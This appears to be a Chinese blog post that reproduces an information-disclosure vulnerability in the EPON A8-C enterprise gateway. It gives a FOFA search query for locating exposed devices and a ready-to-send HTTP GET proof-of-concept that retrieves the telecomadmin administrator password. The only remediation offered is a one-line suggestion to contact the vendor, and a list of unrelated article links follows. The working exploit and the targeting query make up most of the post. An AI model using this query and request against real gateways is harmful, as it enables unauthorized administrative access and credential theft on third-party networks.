【漏洞复现】EPON上行A8-C政企网关信息泄露漏洞

Nx01 产品简介

EPON上行A8-C政企网关是一款终端产品,提供企业网络解决方案。

Nx02 漏洞描述

EPON上行A8-C政企网关敏感信息泄露漏洞,攻击者通过敏感信息泄露获取管理员密码。

Nx03 产品主页

fofa-query: "ZXECS" && title=="Web user login"

Nx04 漏洞复现

POC:

复制代码
GET /user/local_user_mod.php?index_name=telecomadmin HTTP/1.1
Host: {{Hostname}}
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

Nx05 修复建议

建议联系软件厂商进行处理。

相关推荐
QYR_114 分钟前
防水医用无人机市场报告:现状、趋势与洞察
大数据·网络·市场研究
烟斗与演绎4 分钟前
综合实验(4)
网络·网络安全·智能路由器
仙云Q127 分钟前
IP协议解析:从寻址到路由
网络
万象.17 分钟前
Linux网络
linux·网络
吃不得辣条1 小时前
网络安全笔记
笔记·web安全·智能路由器
Goboy1 小时前
弹窗大战15年祭,零信任iOA的枪口,正对准哪吒的方向盘
安全·程序员·产品
Teamhelper_AR1 小时前
AR眼镜:工业4.0时代高风险作业的安全守护者
安全·ar
期待未来的男孩1 小时前
第五天上课 SSLPolicy策略和Network Discovery技术
网络·防火墙
是阿建吖!1 小时前
【Linux | 网络】传输层(UDP和TCP) - 两万字详细讲解!!
linux·网络·udp·tcp
刺猬-----2 小时前
OSPF多区域
网络